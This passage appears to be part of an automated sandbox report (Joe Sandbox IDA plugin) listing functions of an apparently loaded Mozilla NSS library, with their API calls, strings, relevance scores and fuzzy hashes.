API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: b0445357bf5afb89baad9211683fb84caf24a502e351e9813b0d142498677dd5
Instruction ID: d34026a13ad8800a7c7acfb78e6d8f77a2ada032536e9cd7fad2ad86370b83c9
Opcode Fuzzy Hash: b0445357bf5afb89baad9211683fb84caf24a502e351e9813b0d142498677dd5
Instruction Fuzzy Hash: 0601C876B4401097E701D2ACAC95AEF3D988BC765CF080939E905D7B41F625DD0A47F3

Function 6C6BBDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBDC3
free.MOZGLUE(?,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBDE9
free.MOZGLUE(?,00000000,00000000,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBE21
free.MOZGLUE(00000000,00000000,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBE32

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: 0899cfbc3fa4cab10636f0b245f5c638bcdf3a96bb097b1f041de03ef8e3e7ec
Instruction ID: 113b2ebc9d8f48413b2ea98e5e1366d20c959930d94081f234e39a78218acb26
Opcode Fuzzy Hash: 0899cfbc3fa4cab10636f0b245f5c638bcdf3a96bb097b1f041de03ef8e3e7ec
Instruction Fuzzy Hash: 5A1106F6B013009FDF51DF29D889B023BB5BB4A354B14007DE50A97710EB32A425CBA5

Function 6C603E10 Relevance: 7.5, APIs: 5, Instructions: 45memoryfileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,-00000001,?,00000000,?,6C603975), ref: 6C603E29
PORT_Alloc_Util.NSS3(00000000,?,00000000,?,6C603975), ref: 6C603E38

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,6C603975), ref: 6C603E52
DeleteFileW.KERNEL32(00000000), ref: 6C603E5D
free.MOZGLUE(00000000), ref: 6C603E64

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_DeleteFileUtilValuefreemalloc
String ID:
API String ID: 3873820591-0
Opcode ID: 3b82ba231935348d51b22950566ca7698e323a5802b0c308039dcbb2374541c5
Instruction ID: d9d66d39826741b43819fcbdda10904b97e6ca6cb911f99fe494f247dcc90839
Opcode Fuzzy Hash: 3b82ba231935348d51b22950566ca7698e323a5802b0c308039dcbb2374541c5
Instruction Fuzzy Hash: E2F0B4B53061023BFB24267A6D49E37365DCB42AFAF140335BE3AD59C1EA40CC118279

Function 6C6B7C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C6B7C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B7C83
malloc.MOZGLUE(00000001), ref: 6C6B7C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6B7C9F
PR_GetCurrentThread.NSS3 ref: 6C6B7CAD

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: caa4dc3931a21bace99908bb1be9834a94d8195957b2059762917f1b7ef02912
Instruction ID: 34e72c5be992ef17cf4f293eb20bfc2cc4c80099295c63252e86833e08fb06e3
Opcode Fuzzy Hash: caa4dc3931a21bace99908bb1be9834a94d8195957b2059762917f1b7ef02912
Instruction Fuzzy Hash: AAF0C2B19102066FEB009F3A9C099577758EF42369B018439EC09D3B00E735F124CBED

Function 6C6BADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C6BA6D8), ref: 6C6BAE0D
free.MOZGLUE(?), ref: 6C6BAE14
DeleteCriticalSection.KERNEL32(6C6BA6D8), ref: 6C6BAE36
free.MOZGLUE(?), ref: 6C6BAE3D
free.MOZGLUE(00000000,00000000,?,?,6C6BA6D8), ref: 6C6BAE47

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: dcf99cf3858bee194d509f64f91bebbf52caf181894628c6ab9f2c956da4a128
Instruction ID: a3487b37d456b520bef265d97a239c2e4978df19505ed355d97d5966ae9d3bc4
Opcode Fuzzy Hash: dcf99cf3858bee194d509f64f91bebbf52caf181894628c6ab9f2c956da4a128
Instruction Fuzzy Hash: D9F0C275201A02A7CB209F69A8489177779BE86774B100328F13B83981D732F027D7D9

Function 6C53BCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(6C6DAAF9,?), ref: 6C53BE37

Strings

kl, xrefs: 6C53BDD7
Pkl, xrefs: 6C53BED4
winFileSize, xrefs: 6C53BF07

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_mprintf
String ID: kl$Pkl$winFileSize
API String ID: 4246442610-2393575200
Opcode ID: 035e767ab2bde70ac28a8102fee387e8bf467c9a31d7c4923328d89b74f164ac
Instruction ID: fdf2b9d335ab872e9075ca97e024bfe575a2a884c70f2515203853dbb351e9c6
Opcode Fuzzy Hash: 035e767ab2bde70ac28a8102fee387e8bf467c9a31d7c4923328d89b74f164ac
Instruction Fuzzy Hash: 9161C131A04A25DFDB05DF29C8807A9BBB2FF8A314F045EA5D4198BB80E730E855CBD5

Function 6C547C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C547D35

Strings

%s at line %d of [%.10s], xrefs: 6C547D2E
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C547D13, 6C547D1F, 6C547D47, 6C547D53, 6C547D5F
database corruption, xrefs: 6C547D29

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 99206ca7ba117578c1e1d8c14cf5abd2c55139c4b65248617486b71086693d42
Instruction ID: 3ec35bcf9b462d5990c4e0b296abf77afb3f6fd426eaafb22aeff76a3531a520
Opcode Fuzzy Hash: 99206ca7ba117578c1e1d8c14cf5abd2c55139c4b65248617486b71086693d42
Instruction Fuzzy Hash: 60312871E0422997C710CF9DCC809BEB7F1EF88345B598596E444B7B86D271DC52CBA4

Function 6C536C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C536D36

Strings

%s at line %d of [%.10s], xrefs: 6C536D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C536D20
database corruption, xrefs: 6C536D2A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 762c4f91fbc6ccc266fbaa0aaad3574ecd62cf1133299b5116e070ac8270ec2a
Instruction ID: 8871747a4a93fb4b304848d946fe239860dde584c29c1a31c99659742a8d1a39
Opcode Fuzzy Hash: 762c4f91fbc6ccc266fbaa0aaad3574ecd62cf1133299b5116e070ac8270ec2a
Instruction Fuzzy Hash: 2E21FC306043149BC711CE1ADC41B5AB7E2BF84308F248A2DD84D9BB91FB70F9498B92

Function 6C612FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+al,6C6132C2,<+al,00000000,00000000,?), ref: 6C612FDA

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C61300B

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C61302A

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

Part of subcall function 6C5EC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C5EC45D
Part of subcall function 6C5EC3D0: TlsGetValue.KERNEL32 ref: 6C5EC494
Part of subcall function 6C5EC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C5EC4A9
Part of subcall function 6C5EC3D0: PR_Unlock.NSS3(?), ref: 6C5EC4F4

Strings

<+al, xrefs: 6C612FD0

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+al
API String ID: 2538134263-2537768593
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 52ffd5809dcac5addcd626af0fbb10fb65594e74f440129e1969759d38a99f16
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: EF11E7F6B00104ABDB008E69DC00A9B77D9AB8536DF184134F91DD7B80E772ED15C7A5

Function 6C66CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C66CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C66CC7B), ref: 6C66CD7A
Part of subcall function 6C66CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C66CD8E
Part of subcall function 6C66CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C66CDA5
Part of subcall function 6C66CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C66CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C66CCB5
memcpy.VCRUNTIME140(6C7014F4,6C7002AC,00000090), ref: 6C66CCD3
memcpy.VCRUNTIME140(6C701588,6C7002AC,00000090), ref: 6C66CD2B

Part of subcall function 6C589AC0: socket.WSOCK32(?,00000017,6C5899BE), ref: 6C589AE6
Part of subcall function 6C589AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C5899BE), ref: 6C589AFC

Part of subcall function 6C590590: closesocket.WSOCK32(6C589A8F,?,?,6C589A8F,00000000), ref: 6C590597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C66CCB0

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 63c13eed9c57e4b27cb35ecce2e16587dd6028e059f52df9a95e9186677aaf8f
Instruction ID: 5f2cdb3a557b1b32bb810db4d011c4f37f1b058a6ab7312412c23a2134bff676
Opcode Fuzzy Hash: 63c13eed9c57e4b27cb35ecce2e16587dd6028e059f52df9a95e9186677aaf8f
Instruction Fuzzy Hash: 7B110AF1B002409FDB009F6A98467463AE8978631CF14153DF51AEFB41EF71D4148BDA

Function 6C537F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C5381DF
LeaveCriticalSection.KERNEL32(?), ref: 6C538239
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C538255
sqlite3_free.NSS3(00000000), ref: 6C538260

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpysqlite3_free
String ID:
API String ID: 1525636458-0
Opcode ID: b43f698dc9ba8b6a92f4572f090cc7b3d550eb4d71371686d08df42ae343c2bb
Instruction ID: b4442d27e6df2e88bfad46738e742986f35d6a3129bd2b5a2a20b34c2a91b617
Opcode Fuzzy Hash: b43f698dc9ba8b6a92f4572f090cc7b3d550eb4d71371686d08df42ae343c2bb
Instruction Fuzzy Hash: 5C918F71B01618CBEB08DFA1EC887ADBBB1BF06304F14112FD41ADB654EB396955CB86

Function 6C611D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C611D8F

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C611DA6

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C611E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C611ED0

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: d8f4fb6d18bcb2d5a93b352a3f0b9c659acc39f65f34ba9c964f4546e25a1e71
Instruction ID: 433109fb48b78fa0894fc40da75a375371d895805a84cbb296670659dcc21027
Opcode Fuzzy Hash: d8f4fb6d18bcb2d5a93b352a3f0b9c659acc39f65f34ba9c964f4546e25a1e71
Instruction Fuzzy Hash: 54517775A04309CFDB04CF98D884BAEBBB6BF59309F144129E819AFB50D731E946CB94

Function 6C664FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C5485D2,00000000,?,?), ref: 6C664FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C66500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6650C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6650D6

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: d9114e23c6bfb31b6199afef45c5624302afa0c6c452978e5d5b15f22b7ae7d7
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 134181B2A002118FCB18CF19DCD279AB7E1BF4431871D46ADD84ACBB02E775E891CB95

Function 6C58FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3(00000000,?,?,?,6C58FDFE), ref: 6C58FFAD

Part of subcall function 6C52CA30: EnterCriticalSection.KERNEL32(?,?,?,6C58F9C9,?,6C58F4DA,6C58F9C9,?,?,6C55369A), ref: 6C52CA7A
Part of subcall function 6C52CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C52CB26

memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C58FDFE), ref: 6C58FFDF
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C58FDFE), ref: 6C59001C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C58FDFE), ref: 6C59006F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
String ID:
API String ID: 2358433136-0
Opcode ID: ae36799ee94ae7b3cc2316ab897e79e761bdc9a3f4fee6c8fd9d026f60c9f56e
Instruction ID: 8b39be9075028bdd758d90586324c3984867d73802379a9d20d0b27fa5daa107
Opcode Fuzzy Hash: ae36799ee94ae7b3cc2316ab897e79e761bdc9a3f4fee6c8fd9d026f60c9f56e
Instruction Fuzzy Hash: 6441F1B1F012559BDB08DF65EC89AAE7775FF8A304F04047ED81693700DB35A911CBA5

Function 6C677DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C677E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C677EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C677EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C677ED8

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
